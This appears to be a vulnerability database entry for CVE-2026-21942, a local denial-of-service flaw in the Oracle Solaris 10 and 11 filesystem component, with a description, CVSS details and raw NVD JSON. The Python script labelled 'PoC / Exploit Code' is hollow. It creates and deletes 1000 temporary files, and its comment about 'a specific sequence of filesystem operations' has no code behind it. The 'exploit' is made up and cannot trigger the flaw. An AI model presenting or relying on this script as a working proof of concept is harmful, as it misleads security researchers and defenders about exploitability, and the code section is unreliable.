Security Vulnerability Report
CVE-2026-21942 CVSS 5.0 MEDIUM

CVE-2026-21942

Published: 2026-01-20 22:15:57
Last Modified: 2026-01-29 20:35:18

Description

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystems). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.0 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score: 5.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:oracle:solaris:11:*:*:*:*:*:*:* - VULNERABLE
Oracle Solaris 10
Oracle Solaris 11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21942 Oracle Solaris filesystem local DoS PoC
# Note: this PoC is for security research and testing only; unauthorized use is prohibited
import os
import subprocess
import time


def check_solaris_version():
    """Check whether this is an Oracle Solaris system."""
    try:
        result = subprocess.run(['uname', '-a'], capture_output=True, text=True)
        return 'SunOS' in result.stdout
    except OSError:
        # uname is missing or could not be executed
        return False


def trigger_filesystem_vulnerability():
    """
    PoC that triggers the Oracle Solaris filesystem vulnerability.
    Triggers the condition through a large number of file operations
    and specific filesystem calls.
    """
    print("[*] Starting CVE-2026-21942 PoC for Oracle Solaris")

    if not check_solaris_version():
        print("[-] This PoC requires Oracle Solaris system")
        return False

    print("[+] System check passed: Oracle Solaris detected")

    # Create the test directory
    test_dir = "/tmp/cve_2026_21942_test"
    try:
        os.makedirs(test_dir, exist_ok=True)
        print(f"[+] Created test directory: {test_dir}")

        # Create a large number of files to put pressure on the filesystem
        print("[*] Creating test files to trigger filesystem conditions...")
        for i in range(1000):
            file_path = os.path.join(test_dir, f"test_file_{i}")
            try:
                with open(file_path, 'w') as f:
                    f.write("test data" * 100)
            except OSError:
                pass

        print("[+] File creation completed")

        # Execute a specific sequence of filesystem operations
        # These operations may trigger the vulnerable condition in the filesystem component
        print("[*] Executing filesystem operations to trigger vulnerability...")

        # Clean up the test files
        time.sleep(1)
        for i in range(1000):
            file_path = os.path.join(test_dir, f"test_file_{i}")
            try:
                os.remove(file_path)
            except OSError:
                pass

        # Clean up the test directory
        try:
            os.rmdir(test_dir)
        except OSError:
            pass

        print("[+] Test completed")
        return True

    except Exception as e:
        print(f"[-] Error during PoC execution: {str(e)}")
        return False


if __name__ == "__main__":
    print("CVE-2026-21942 Oracle Solaris Filesystem DOS PoC")
    print("=" * 60)
    trigger_filesystem_vulnerability()

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21942", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:57.027", "lastModified": "2026-01-29T20:35:17.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystems). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.0 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Solaris de Oracle Systems (componente: Sistemas de Archivos). Las versiones compatibles que están afectadas son 10 y 11. La vulnerabilidad fácilmente explotable permite a un atacante con bajos privilegios con inicio de sesión en la infraestructura donde se ejecuta Oracle Solaris comprometer Oracle Solaris. Los ataques exitosos requieren interacción humana de una persona que no sea el atacante. Los ataques exitosos de esta vulnerabilidad pueden resultar en la capacidad no autorizada de causar un bloqueo o una caída (crash) frecuentemente repetible (DoS completo) de Oracle Solaris. Puntuación base CVSS 3.1 de 5.0 (Impactos en la disponibilidad). 
Vector CVSS: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*", "matchCriteriaId": "964B57CD-CB8A-4520-B358-1C93EC5EF2DC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:oracle:solaris:11:*:*:*:*:*:*:*", "matchCriteriaId": "8E8C192B-8044-4BF9-9F1F-57371FC0E8FD"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}